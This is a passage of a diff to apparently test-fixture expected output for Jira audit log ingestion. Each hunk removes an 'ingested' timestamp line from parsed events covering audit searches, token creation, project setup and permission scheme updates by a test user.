performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"45 - 94\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z\"}]}", "type": "info", "kind": "event" @@ -119,7 +118,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924702210Z", "original": "{\"timestamp\":\"2021-11-22T00:34:40.008Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"44 - 93\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z\"}]}", "type": "info", "kind": "event" @@ -189,7 +187,6 @@ }, "event": { "action": "personal.access.tokens.audit.log.summary.token.created", - "ingested": "2021-12-24T00:58:01.924703274Z", "original": "{\"timestamp\":\"2021-11-22T00:34:23.154Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"personal.access.tokens.audit.log.category\",\"category\":\"Security\",\"actionI18nKey\":\"personal.access.tokens.audit.log.summary.token.created\",\"action\":\"Personal access token created\"},\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"User\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"personal.access.tokens.audit.log.extra.attribute.name\",\"name\":\"Token Name\",\"value\":\"asdf\"}]}", "type": [ "admin", @@ -259,7 +256,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924704183Z", "original": "{\"timestamp\":\"2021-11-22T00:32:20.234Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 40\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"40\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:33.746Z\"}]}", "type": "info", "kind": "event" @@ -329,7 +325,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924705061Z", "original": "{\"timestamp\":\"2021-11-22T00:31:52.991Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"41 - 90\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:33.887Z - 2021-11-22T00:31:37.412Z\"}]}", "type": "info", "kind": "event" @@ -399,7 +394,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924705951Z", "original": "{\"timestamp\":\"2021-11-22T00:31:37.412Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"69 - 78\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.227Z - 2021-11-22T00:08:34.249Z\"}]}", "type": "info", "kind": "event" @@ -469,7 +463,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924706831Z", "original": "{\"timestamp\":\"2021-11-22T00:31:26.455Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"79 - 88\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.266Z - 2021-11-22T00:30:59.449Z\"}]}", "type": "info", "kind": "event" @@ -539,7 +532,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924707718Z", "original": "{\"timestamp\":\"2021-11-22T00:30:59.449Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 87\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"87\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:26:03.206Z\"}]}", "type": "info", "kind": "event" @@ -609,7 +601,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924708589Z", "original": "{\"timestamp\":\"2021-11-22T00:26:03.206Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 86\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"86\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:12:02.856Z\"}]}", "type": "info", "kind": "event" @@ -679,7 +670,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924709515Z", "original": "{\"timestamp\":\"2021-11-22T00:12:02.856Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 85\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"85\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:34.545Z\"}]}", "type": "info", "kind": "event" @@ -749,7 +739,6 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-24T00:58:01.924710381Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.545Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.created\",\"action\":\"Project version created\"},\"affectedObjects\":[{\"name\":\"Version 3.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10002\",\"id\":\"10002\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Version 3.0\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -819,7 +808,6 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-24T00:58:01.924711450Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.543Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.created\",\"action\":\"Project version created\"},\"affectedObjects\":[{\"name\":\"Version 2.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10001\",\"id\":\"10001\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Version 2.0\"},{\"key\":\"Release date\",\"i18nKey\":\"version.releasedate\",\"to\":\"2021-11-28\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -894,7 +882,6 @@ }, "event": { "action": "jira.auditing.version.released", - "ingested": "2021-12-24T00:58:01.924712412Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.535Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.released\",\"action\":\"Project version released\"},\"affectedObjects\":[{\"name\":\"Version 1.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10000\",\"id\":\"10000\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -957,7 +944,6 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-24T00:58:01.924713282Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.521Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.created\",\"action\":\"Project version created\"},\"affectedObjects\":[{\"name\":\"Version 1.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10000\",\"id\":\"10000\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Version 1.0\"},{\"key\":\"Release date\",\"i18nKey\":\"version.releasedate\",\"to\":\"2021-11-14\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1032,7 +1018,6 @@ }, "event": { "action": "jira.auditing.project.roles.changed", - "ingested": "2021-12-24T00:58:01.924714177Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.506Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.project.roles.changed\",\"action\":\"Project roles changed\"},\"affectedObjects\":[{\"name\":\"Developers\",\"type\":\"PROJECT_ROLE\",\"id\":\"10100\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Users\",\"i18nKey\":\"admin.common.words.users\",\"to\":\"JIRAUSER10000\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1101,7 +1086,6 @@ }, "event": { "action": "jira.auditing.project.created", - "ingested": "2021-12-24T00:58:01.924715073Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.297Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.project.created\",\"action\":\"Project created\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Default Assignee\",\"i18nKey\":\"admin.projects.default.assignee\",\"to\":\"Unassigned\"},{\"key\":\"Description\",\"i18nKey\":\"common.concepts.description\",\"to\":\"\"},{\"key\":\"Key\",\"i18nKey\":\"common.words.key\",\"to\":\"TEST\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"test\"},{\"key\":\"Project Lead\",\"i18nKey\":\"common.concepts.projectlead\",\"to\":\"test.user\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "creation" @@ -1195,7 +1179,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.added.to.project", - "ingested": "2021-12-24T00:58:01.924716064Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.266Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.added.to.project\",\"action\":\"Permission scheme added to project\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1258,7 +1241,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.removed.from.project", - "ingested": "2021-12-24T00:58:01.924718648Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.249Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.removed.from.project\",\"action\":\"Permission scheme removed from project\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "deletion" @@ -1327,7 +1309,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924719521Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.243Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1396,7 +1377,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924720383Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.241Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Start/Complete Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1465,7 +1445,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924721249Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.239Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1534,7 +1513,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924722111Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.236Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"View Development Tools\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1603,7 +1581,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924723033Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.235Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Transition Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1672,7 +1649,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924724115Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.233Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"View Read-Only Workflow\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -1741,7 +1717,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924725021Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.231Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software 